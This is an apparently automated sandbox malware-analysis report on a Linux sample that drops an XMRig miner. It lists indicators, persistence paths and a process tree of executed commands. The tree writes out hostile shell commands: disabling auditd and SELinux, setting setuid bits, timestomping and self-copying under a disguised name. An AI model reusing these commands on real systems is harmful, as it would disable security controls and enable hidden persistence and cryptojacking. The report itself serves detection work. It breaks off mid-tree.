Analysis
-
max time kernel
27s -
max time network
149s -
platform
ubuntu-24.04_amd64 -
resource
ubuntu2404-amd64-20240523-en -
resource tags
arch:amd64arch:i386image:ubuntu2404-amd64-20240523-enkernel:6.8.0-31-genericlocale:en-usos:ubuntu-24.04-amd64system -
submitted
08-10-2024 14:14
Behavioral task
behavioral1
Sample
22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13
-
Size
8.9MB
-
MD5
656e22c65bf7c04d87b5afbe52b8d800
-
SHA1
0fd199053171fec86be186106eac717c4edae2ad
-
SHA256
22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13
-
SHA512
697954f75e391a6cc600b7d40509ac1a1515cb0a4234cc3ae4270beaf7bbc3a3da23a9cd4f25e0eb4f5956d24ca3866e2574dc9493644845aac1063e1e4b0183
-
SSDEEP
196608:WVm8yS4rLDSkQLfkwE7tdQagxldCn588VM2ywSb2VEGCN4:WVm0GSkQLkN773+2MHzaV1C2
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Modifies the dynamic linker configuration file 2 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
Processes:
gvfs-mtp-volume-monitordescription ioc process File opened for modification /etc/ld.so.preload gvfs-mtp-volume-monitor -
XMRig Miner payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/3773-4-0x0000000000400000-0x0000000000ae87b8-memory.dmp xmrig -
File and Directory Permissions Modification 1 TTPs 17 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodshchmodchmodchmodshshchmodchmodshchmodchmodshshshpid process 2690 chmod 3735 chmod 3762 chmod 3783 sh 3761 chmod 2707 chmod 3728 chmod 2496 sh 2535 sh 2536 chmod 2693 chmod 3733 sh 3785 chmod 2498 chmod 2688 sh 2691 sh 2706 sh -
Indicator Removal: Clear Command History 1 TTPs 1 IoCs
Adversaries may remove indicators of compromise from the host to evade detection.
-
Deletes itself 1 IoCs
Processes:
22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13pid process 2486 22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13 -
Executes dropped EXE 2 IoCs
Processes:
gvfs-mtp-volume-monitorperfctlioc pid process /tmp/.perf.c/gvfs-mtp-volume-monitor 2500 gvfs-mtp-volume-monitor /tmp/.perf.c/perfctl 3773 perfctl -
Checks hardware identifiers (DMI) 1 TTPs 6 IoCs
Checks DMI information which indicate if the system is a virtual machine.
Processes:
gvfs-mtp-volume-monitorperfctldescription ioc process File opened for reading /sys/class/dmi/id/product_name gvfs-mtp-volume-monitor File opened for reading /sys/class/dmi/id/sys_vendor gvfs-mtp-volume-monitor File opened for reading /sys/devices/virtual/dmi/id/product_name perfctl File opened for reading /sys/devices/virtual/dmi/id/board_vendor perfctl File opened for reading /sys/devices/virtual/dmi/id/bios_vendor perfctl File opened for reading /sys/devices/virtual/dmi/id/sys_vendor perfctl -
Creates/modifies Cron job 1 TTPs 4 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
gvfs-mtp-volume-monitorcrontabdescription ioc process File opened for modification /etc/cron.daily/perfclean gvfs-mtp-volume-monitor File opened for modification /etc/cron.hourly/perfclean gvfs-mtp-volume-monitor File opened for modification /etc/cron.d/perfclean gvfs-mtp-volume-monitor File opened for modification /var/spool/cron/crontabs/tmp.RuiXWi crontab -
Creates/modifies environment variables 1 TTPs 1 IoCs
Creating/modifying environment variables is a common persistence mechanism.
Processes:
gvfs-mtp-volume-monitordescription ioc process File opened for modification /etc/profile gvfs-mtp-volume-monitor -
Processes:
touchgetentsetenforcepid process 2710 touch 3729 getent 2514 setenforce -
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
Processes:
gvfs-mtp-volume-monitordescription ioc process File opened for reading /proc/net/tcp gvfs-mtp-volume-monitor -
Enumerates running processes
Discovers information about currently running processes on the system
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 7 api.ipify.org 8 api.ipify.org -
Modifies special file permissions 1 TTPs 6 IoCs
Adds special setuid and/ or setgid bits on a file, possibly to elevate privileges.
Processes:
chmodchmodchmodchmodchmodchmodpid process 2718 chmod 3728 chmod 3735 chmod 3761 chmod 3762 chmod 3785 chmod -
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
Processes:
gvfs-mtp-volume-monitordescription ioc process File opened for modification /etc/systemd/system/kmodaudit.service gvfs-mtp-volume-monitor -
Reads hardware information 1 TTPs 19 IoCs
Accesses system info like serial numbers, manufacturer names etc.
Processes:
perfctlgvfs-mtp-volume-monitordescription ioc process File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag perfctl File opened for reading /sys/devices/virtual/dmi/id/bios_version perfctl File opened for reading /sys/devices/virtual/dmi/id/product_version perfctl File opened for reading /sys/devices/virtual/dmi/id/board_name perfctl File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag perfctl File opened for reading /sys/devices/virtual/dmi/id/chassis_serial perfctl File opened for reading /sys/devices/virtual/dmi/id/product_serial perfctl File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor perfctl File opened for reading /sys/devices/virtual/dmi/id/chassis_type perfctl File opened for reading /sys/class/dmi/id/product_uuid gvfs-mtp-volume-monitor File opened for reading /sys/class/dmi/id/product_sku gvfs-mtp-volume-monitor File opened for reading /sys/class/dmi/id/product_version gvfs-mtp-volume-monitor File opened for reading /sys/devices/virtual/dmi/id/board_serial perfctl File opened for reading /sys/devices/virtual/dmi/id/chassis_version perfctl File opened for reading /sys/devices/virtual/dmi/id/bios_date perfctl File opened for reading /sys/class/dmi/id/product_family gvfs-mtp-volume-monitor File opened for reading /sys/class/dmi/id/product_serial gvfs-mtp-volume-monitor File opened for reading /sys/devices/virtual/dmi/id/product_uuid perfctl File opened for reading /sys/devices/virtual/dmi/id/board_version perfctl -
Reads list of loaded kernel modules 1 TTPs 3 IoCs
Reads the list of currently loaded kernel modules, possibly to detect virtual environments.
Processes:
22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c1322e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13gvfs-mtp-volume-monitordescription ioc process File opened for reading /proc/modules 22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13 File opened for reading /proc/modules 22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13 File opened for reading /proc/modules gvfs-mtp-volume-monitor -
Writes file to system bin folder 6 IoCs
Processes:
gvfs-mtp-volume-monitordescription ioc process File opened for modification /bin/.local/bin/crontab gvfs-mtp-volume-monitor File opened for modification /bin/.local/bin/ldd gvfs-mtp-volume-monitor File opened for modification /bin/.local/bin/lsof gvfs-mtp-volume-monitor File opened for modification /bin/wizlmsh gvfs-mtp-volume-monitor File opened for modification /bin/perfcc gvfs-mtp-volume-monitor File opened for modification /bin/.local/bin/top gvfs-mtp-volume-monitor -
Indicator Removal: Timestomp 1 TTPs 11 IoCs
Adversaries may remove indicators of compromise from the host to evade detection.
Processes:
touchshshtouchtouchtouchshtouchshtouchshpid process 2708 touch 2537 sh 2573 sh 2576 touch 2686 touch 2625 touch 2684 sh 2538 touch 2551 sh 2552 touch 2619 sh -
Modifies Bash startup script 2 TTPs 1 IoCs
Processes:
gvfs-mtp-volume-monitordescription ioc process File opened for modification /etc/profile gvfs-mtp-volume-monitor -
Processes:
resource yara_rule /root/.config/cron/perfcc upx /tmp/.perf.c/perfctl upx -
Changes its process name 2 IoCs
Processes:
systemctlsystemctldescription ioc pid process Changes the process name, possibly in an attempt to hide itself (sysv-install) 2548 systemctl Changes the process name, possibly in an attempt to hide itself (sysv-install) 3254 systemctl -
Checks CPU configuration 1 TTPs 4 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
gvfs-mtp-volume-monitorperfctl22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c1322e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13description ioc process File opened for reading /proc/cpuinfo gvfs-mtp-volume-monitor File opened for reading /proc/cpuinfo perfctl File opened for reading /proc/cpuinfo 22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13 File opened for reading /proc/cpuinfo 22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13 -
Reads CPU attributes 1 TTPs 7 IoCs
Processes:
psperfctlpkillpspkilldescription ioc process File opened for reading /sys/devices/system/cpu/possible ps File opened for reading /sys/devices/system/cpu/online perfctl File opened for reading /sys/devices/system/cpu/types perfctl File opened for reading /sys/devices/system/cpu/possible perfctl File opened for reading /sys/devices/system/cpu/possible pkill File opened for reading /sys/devices/system/cpu/possible ps File opened for reading /sys/devices/system/cpu/possible pkill -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
Processes:
gvfs-mtp-volume-monitordescription ioc process File opened for reading /proc/net/tcp gvfs-mtp-volume-monitor -
Command and Scripting Interpreter: Unix Shell 1 TTPs 44 IoCs
Execute scripts via Unix Shell.
Processes:
shshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshpid process 2713 sh 2736 sh 3242 sh 3546 sh 3549 sh 3722 sh 3736 sh 3742 sh 3780 sh 2499 sh 2732 sh 3730 sh 3758 sh 2719 sh 2787 sh 3688 sh 3749 sh 3769 sh 3786 sh 3792 sh 2485 sh 2511 sh 2670 sh 3706 sh 3719 sh 3752 sh 3755 sh 2513 sh 2529 sh 2709 sh 3725 sh 3772 sh 2717 sh 3746 sh 3763 sh 3766 sh 2507 sh 2515 sh 2731 sh 3710 sh 3713 sh 3716 sh 3743 sh 3793 sh -
Enumerates kernel/hardware configuration 1 TTPs 64 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
gvfs-mtp-volume-monitorperfctlpspkilldescription ioc process File opened for reading /sys/bus/pci/devices/0000:00:04.0/modalias gvfs-mtp-volume-monitor File opened for reading /sys/devices/system/memory/memory9/state gvfs-mtp-volume-monitor File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition perfctl File opened for reading /sys/fs/cgroup/cgroup.controllers perfctl File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_cpus perfctl File opened for reading /sys/bus/dax/devices/target_node perfctl File opened for reading /sys/devices/virtual/dmi/id perfctl File opened for reading /sys/devices/system/node/node0/cpu0/topology/core_id gvfs-mtp-volume-monitor File opened for reading /sys/devices/system/memory/memory14/state gvfs-mtp-volume-monitor File opened for reading /sys/bus/node/devices/node0/meminfo perfctl File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages perfctl File opened for reading /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages perfctl File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages perfctl File opened for reading /sys/class/drm gvfs-mtp-volume-monitor File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq perfctl File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/size perfctl File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets perfctl File opened for reading /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map perfctl File opened for reading /sys/devices/system/node ps File opened for reading /sys/bus/cpu/devices/cpu0/topology/package_cpus perfctl File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level perfctl File opened for reading /sys/bus/pci/devices/0000:00:00.0/modalias gvfs-mtp-volume-monitor File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map perfctl File opened for reading /sys/devices/system/memory/memory10/state gvfs-mtp-volume-monitor File opened for reading /sys/devices/system/memory/memory2/state gvfs-mtp-volume-monitor File opened for reading /sys/kernel/mm/hugepages gvfs-mtp-volume-monitor File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map perfctl File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size perfctl File opened for reading /sys/bus/pci/devices/0000:00:01.3/revision gvfs-mtp-volume-monitor File opened for reading /sys/bus/pci/devices/0000:00:04.0/revision gvfs-mtp-volume-monitor File opened for reading /sys/bus/pci/devices/0000:00:05.0/modalias gvfs-mtp-volume-monitor File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map perfctl File opened for reading /sys/bus/node/devices/node0/cpumap perfctl File opened for reading /sys/bus/dax/devices perfctl File opened for reading /sys/bus/pci/devices/0000:00:01.0/revision gvfs-mtp-volume-monitor File opened for reading /sys/bus/node/devices/node0/hugepages perfctl File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages perfctl File opened for reading /sys/bus/node/devices/node0/access1/initiators perfctl File opened for reading /sys/devices/system/node/node0/cpu0/cache/index1/type gvfs-mtp-volume-monitor File opened for reading /sys/bus/pci/devices/0000:00:01.0/modalias gvfs-mtp-volume-monitor File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type perfctl File opened for reading /sys/bus/dax/target_node perfctl File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages perfctl File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id perfctl File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size perfctl File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition perfctl File opened for reading /sys/bus/pci/devices/0000:00:02.0/modalias gvfs-mtp-volume-monitor File opened for reading /sys/devices/system/memory/memory13/state gvfs-mtp-volume-monitor File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets perfctl File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/level perfctl File opened for reading /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map perfctl File opened for reading /sys/devices/system/node/node0 gvfs-mtp-volume-monitor File opened for reading /sys/devices/system/node/node0/cpu0/cache/index1/level gvfs-mtp-volume-monitor File opened for reading /sys/devices/system/node/node0/cpu0/cache/index3/shared_cpu_map gvfs-mtp-volume-monitor File opened for reading /sys/bus/cpu/devices/cpu0/topology/die_cpus perfctl File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets perfctl File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/type perfctl File opened for reading /sys/bus/node/devices/node0/access0/initiators perfctl File opened for reading /sys/devices/system/node pkill File opened for reading /sys/bus/pci/devices/0000:00:06.0/modalias gvfs-mtp-volume-monitor File opened for reading /sys/devices/system/memory/memory4/state gvfs-mtp-volume-monitor File opened for reading /sys/devices/system/node/online perfctl File opened for reading /sys/devices/system/node/node0/cpu0/cache/index3/size gvfs-mtp-volume-monitor File opened for reading /sys/bus/pci/devices/0000:00:06.0/revision gvfs-mtp-volume-monitor -
Processes:
gvfs-mtp-volume-monitorpkillpskillallpkillps22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13killalldescription ioc process File opened for reading /proc/2737 gvfs-mtp-volume-monitor File opened for reading /proc/753/cmdline pkill File opened for reading /proc/2248/stat ps File opened for reading /proc/1965/stat gvfs-mtp-volume-monitor File opened for reading /proc/2476/fd gvfs-mtp-volume-monitor File opened for reading /proc/2290/stat killall File opened for reading /proc/30/status ps File opened for reading /proc/3626/environ ps File opened for reading /proc/44/status pkill File opened for reading /proc/512/cmdline pkill File opened for reading /proc/275 killall File opened for reading /proc/11/stat pkill File opened for reading /proc/17/cgroup pkill File opened for reading /proc/1908/cmdline pkill File opened for reading /proc/3593/environ gvfs-mtp-volume-monitor File opened for reading /proc/6/environ ps File opened for reading /proc/37/ctty pkill File opened for reading /proc/1965/ctty ps File opened for reading /proc/3639/ctty ps File opened for reading /proc/56/status ps File opened for reading /proc/30/fd gvfs-mtp-volume-monitor File opened for reading /proc/817/status pkill File opened for reading /proc/3648/cmdline ps File opened for reading /proc/3452/environ gvfs-mtp-volume-monitor File opened for reading /proc/2248/environ ps File opened for reading /proc/3617/cmdline ps File opened for reading /proc/3622/cmdline ps File opened for reading /proc/14/status pkill File opened for reading /proc/41/comm 22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13 File opened for reading /proc/2144/stat gvfs-mtp-volume-monitor File opened for reading /proc/1116 gvfs-mtp-volume-monitor File opened for reading /proc/23/environ gvfs-mtp-volume-monitor File opened for reading /proc/3336/environ gvfs-mtp-volume-monitor File opened for reading /proc/1772/stat killall File opened for reading /proc/3596/stat killall File opened for reading /proc/2239/stat ps File opened for reading /proc/3695/ctty ps File opened for reading /proc/27/stat killall File opened for reading /proc/3624/cmdline ps File opened for reading /proc/1390/cmdline 22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13 File opened for reading /proc/3601 killall File opened for reading /proc/18/cmdline pkill File opened for reading /proc/46/comm 22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13 File opened for reading /proc/433/ctty pkill File opened for reading /proc/1680/stat ps File opened for reading /proc/2197/stat pkill File opened for reading /proc/782 gvfs-mtp-volume-monitor File opened for reading /proc/275/cmdline ps File opened for reading /proc/3552/ctty pkill File opened for reading /proc/2197/status pkill File opened for reading /proc/1688/cmdline ps File opened for reading /proc/2277/cmdline ps File opened for reading /proc/2084/cmdline 22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13 File opened for reading /proc/3548/stat gvfs-mtp-volume-monitor File opened for reading /proc/778/stat killall File opened for reading /proc/3560/stat ps File opened for reading /proc/3656/cmdline ps File opened for reading /proc/meminfo gvfs-mtp-volume-monitor File opened for reading /proc/3261/ctty pkill File opened for reading /proc/19/environ ps File opened for reading /proc/15/status pkill File opened for reading /proc/1946/ctty pkill File opened for reading /proc/1860/environ ps File opened for reading /proc/1961/stat gvfs-mtp-volume-monitor -
Writes file to shm directory 31 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.
Processes:
gvfs-mtp-volume-monitordescription ioc process File opened for modification /dev/shm/.dmesg/pds/2791 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/pds/3690 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/ino/16736 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/pds/2737 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/ino/16787 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/ino/168 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/pds/2553 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/pds/2500 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/pds/2547 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/pds/2787 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/pds/2548 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/pds/2869 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/pds/2993 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/pds/3362 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/pds/3402 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/ino/25571 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/pds/3242 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/pds/3259 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/pds/3549 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/pds/3774 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/pds/2550 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/pds/2529 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/pds/3253 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/pds/3257 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/pds/3404 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/pds/2719 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/pds/2726 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/pds/2731 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/pds/3254 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/pds/3405 gvfs-mtp-volume-monitor File opened for modification /dev/shm/.dmesg/pds/3688 gvfs-mtp-volume-monitor -
Writes file to tmp directory 31 IoCs
Malware often drops required files in the /tmp directory.
Processes:
gvfs-mtp-volume-monitorsh22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13touchshperfctl22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13cpdescription ioc process File opened for modification /tmp/.perf.c/perfctl gvfs-mtp-volume-monitor File opened for modification /tmp/.xdiag/ver gvfs-mtp-volume-monitor File opened for modification /tmp/.xdiag/int/.e.lock gvfs-mtp-volume-monitor File opened for modification /tmp/lgctr2 sh File opened for modification /tmp/.xdiag/tordata/cached-microdescs.new gvfs-mtp-volume-monitor File opened for modification /tmp/.xdiag/elog 22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13 File opened for modification /tmp/.xdiag/p gvfs-mtp-volume-monitor File opened for modification /tmp/.xdiag/tordata/lock gvfs-mtp-volume-monitor File opened for modification /tmp/.xdiag/tordata/ts gvfs-mtp-volume-monitor File opened for modification /tmp/d.xdiag-0 touch File opened for modification /tmp/lgctr sh File opened for modification /tmp/.xdiag/hroot/cp gvfs-mtp-volume-monitor File opened for modification /tmp/.xdiag/cty gvfs-mtp-volume-monitor File opened for modification /tmp/.apid perfctl File opened for modification /tmp/libgcwrap.so gvfs-mtp-volume-monitor File opened for modification /tmp/.xdiag/hroot/hscheck gvfs-mtp-volume-monitor File opened for modification /tmp/.xdiag/cp gvfs-mtp-volume-monitor File opened for modification /tmp/.xdiag/tordata/unverified-microdesc-consensus.tmp gvfs-mtp-volume-monitor File opened for modification /tmp/.xdiag/tordata/control_auth_cookie.tmp gvfs-mtp-volume-monitor File opened for modification /tmp/.xdiag/tordata/cached-microdesc-consensus.tmp gvfs-mtp-volume-monitor File opened for modification /tmp/.xdiag/elog 22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13 File opened for modification /tmp/.perf.c/gvfs-mtp-volume-monitor cp File opened for modification /tmp/.xdiag/tordata/torrc-2766996251 gvfs-mtp-volume-monitor File opened for modification /tmp/.xdiag/tordata/cached-certs.tmp gvfs-mtp-volume-monitor File opened for modification /tmp/.xdiag/exi gvfs-mtp-volume-monitor File opened for modification /tmp/.xdiag/t1 gvfs-mtp-volume-monitor File opened for modification /tmp/.xdiag/hs.txt gvfs-mtp-volume-monitor File opened for modification /tmp/.xdiag/elog gvfs-mtp-volume-monitor File opened for modification /tmp/lgcdm touch File opened for modification /tmp/.xdiag/uid gvfs-mtp-volume-monitor File opened for modification /tmp/.xdiag/tordata/state.tmp gvfs-mtp-volume-monitor -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
description flow ioc HTTP User-Agent header 9 Go-http-client/1.1
Processes
-
/tmp/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13/tmp/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c131⤵
- Reads list of loaded kernel modules
- Checks CPU configuration
- Writes file to tmp directory
PID:2478 -
/usr/bin/getconfgetconf CLK_TCK2⤵PID:2483
-
-
/usr/bin/getconfgetconf PAGESIZE2⤵PID:2484
-
-
/bin/sh/bin/sh -c "PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/snap/bin;nohup /tmp/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13 >/dev/null 2>/dev/null & exit"2⤵
- Command and Scripting Interpreter: Unix Shell
PID:2485 -
/usr/bin/nohupnohup /tmp/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c133⤵PID:2486
-
-
-
/tmp/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13/tmp/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c131⤵
- Deletes itself
- Reads list of loaded kernel modules
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:2486 -
/usr/bin/getconfgetconf CLK_TCK2⤵PID:2494
-
-
/usr/bin/getconfgetconf PAGESIZE2⤵PID:2495
-
-
/bin/sh/bin/sh -c "cp /proc/2486/exe /tmp/.perf.c/gvfs-mtp-volume-monitor && chmod +x /tmp/.perf.c/gvfs-mtp-volume-monitor"2⤵
- File and Directory Permissions Modification
PID:2496 -
/usr/bin/cpcp /proc/2486/exe /tmp/.perf.c/gvfs-mtp-volume-monitor3⤵
- Writes file to tmp directory
PID:2497
-
-
/usr/bin/chmodchmod +x /tmp/.perf.c/gvfs-mtp-volume-monitor3⤵
- File and Directory Permissions Modification
PID:2498
-
-
-
/bin/sh/bin/sh -c "PATH=/tmp/.perf.c:/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/snap/bin;gvfs-mtp-volume-monitor -k &"2⤵
- Command and Scripting Interpreter: Unix Shell
PID:2499
-
-
/tmp/.perf.c/gvfs-mtp-volume-monitorgvfs-mtp-volume-monitor -k1⤵
- Modifies the dynamic linker configuration file
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Creates/modifies Cron job
- Creates/modifies environment variables
- Enumerates active TCP sockets
- Modifies systemd
- Reads hardware information
- Reads list of loaded kernel modules
- Writes file to system bin folder
- Modifies Bash startup script
- Checks CPU configuration
- Reads system network configuration
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to shm directory
- Writes file to tmp directory
PID:2500 -
/usr/bin/getconfgetconf CLK_TCK2⤵PID:2505
-
-
/usr/bin/getconfgetconf PAGESIZE2⤵PID:2506
-
-
/bin/sh/bin/sh -c "auditctl -e0"2⤵
- Command and Scripting Interpreter: Unix Shell
PID:2507 -
/usr/sbin/auditctlauditctl -e03⤵PID:2509
-
-
-
/bin/sh/bin/sh -c "echo 0 > /sys/fs/selinux/enforce"2⤵
- Command and Scripting Interpreter: Unix Shell
PID:2511
-
-
/bin/sh/bin/sh -c "setenforce 0"2⤵
- Command and Scripting Interpreter: Unix Shell
PID:2513 -
/usr/sbin/setenforcesetenforce 03⤵
- Disables SELinux
PID:2514
-
-
-
/bin/sh/bin/sh -c "if grep -q '^SELINUX=' /etc/selinux/config;then sed -i 's/^SELINUX=.*/SELINUX=disabled/' /etc/selinux/config;fi"2⤵
- Command and Scripting Interpreter: Unix Shell
PID:2515 -
/usr/bin/grepgrep -q "^SELINUX=" /etc/selinux/config3⤵PID:2516
-
-
/usr/bin/sedsed -i "s/^SELINUX=.*/SELINUX=disabled/" /etc/selinux/config3⤵PID:2517
-
-
-
/bin/sh/bin/sh -c "if systemctl status auditd|grep -q 'enabled;';then systemctl stop auditd;systemctl disable auditd;fi"2⤵
- Command and Scripting Interpreter: Unix Shell
PID:2529 -
/usr/bin/systemctlsystemctl status auditd3⤵PID:2530
-
-
/usr/bin/grepgrep -q "enabled;"3⤵PID:2531
-
-
/usr/bin/systemctlsystemctl stop auditd3⤵
- Indicator Removal: Clear Command History
PID:2539
-
-
/usr/bin/systemctlsystemctl disable auditd3⤵
- Changes its process name
PID:2547 -
/usr/bin/getoptgetopt -o r: --long root: -- disable auditd4⤵PID:2549
-
-
/usr/sbin/update-rc.d/usr/sbin/update-rc.d auditd defaults4⤵PID:2550
-
/tmp/.perf.c/systemctlsystemctl daemon-reload5⤵PID:2553
-
-
/tmp/systemctlsystemctl daemon-reload5⤵PID:2553
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:2553
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:2553
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:2553
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:2553
-
-
-
/usr/sbin/update-rc.d/usr/sbin/update-rc.d auditd disable4⤵PID:2726
-
/tmp/.perf.c/systemctlsystemctl daemon-reload5⤵PID:2730
-
-
/tmp/systemctlsystemctl daemon-reload5⤵PID:2730
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵PID:2730
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵PID:2730
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵PID:2730
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵PID:2730
-
-
-
-
-
/bin/sh/bin/sh -c "chmod 4755 /bin/wizlmsh"2⤵
- File and Directory Permissions Modification
PID:2535 -
/usr/bin/chmodchmod 4755 /bin/wizlmsh3⤵
- File and Directory Permissions Modification
PID:2536
-
-
-
/bin/sh/bin/sh -c "touch -acmr /bin/sh /bin/wizlmsh"2⤵
- Indicator Removal: Timestomp
PID:2537 -
/usr/bin/touchtouch -acmr /bin/sh /bin/wizlmsh3⤵
- Indicator Removal: Timestomp
PID:2538
-
-
-
/bin/sh/bin/sh -c "touch -acmr /bin/sh /bin/perfcc"2⤵
- Indicator Removal: Timestomp
PID:2551 -
